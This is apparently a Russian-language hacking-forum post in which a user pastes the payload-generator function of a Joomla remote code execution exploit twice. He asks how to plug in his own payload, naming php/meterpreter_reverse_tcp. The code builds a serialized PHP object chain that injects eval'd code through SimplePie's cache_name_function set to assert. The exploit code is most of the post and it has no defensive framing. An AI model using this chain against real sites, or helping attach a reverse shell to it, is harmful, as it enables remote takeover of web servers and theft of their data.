• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

payload

K

kamaz

Привет народ!!
это часть эксплойта ,где пайлд!
подскаите чем сгенерировать мне свой пайлод? и как правильно все указать?
Код:
def generate(payload):

    php_payload = "eval({0})".format(toCharCode(payload))

    terminate = '\xf0\xfd\xfd\xfd';

    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''

    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)   

    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)

    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

    return exploit_template

def exploit(url):

---- Добавлено позже ----

Привет народ!!
это часть эксплойта ,где пайлд!
подскаите чем сгенерировать мне свой пайлод? и как правильно все указать?
Код:
def generate(payload):

    php_payload = "eval({0})".format(toCharCode(payload))

    terminate = '\xf0\xfd\xfd\xfd';

    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''

    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)  

    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)

    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

    return exploit_template

def exploit(url):

этот пробую php/meterpreter_reverse_tcp ? но как все в коде указать?
 
Последнее редактирование модератором:
K

kamaz

как правильно указать мой сгенерированный пайлод в коде (кусок код выше)
спасибо
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!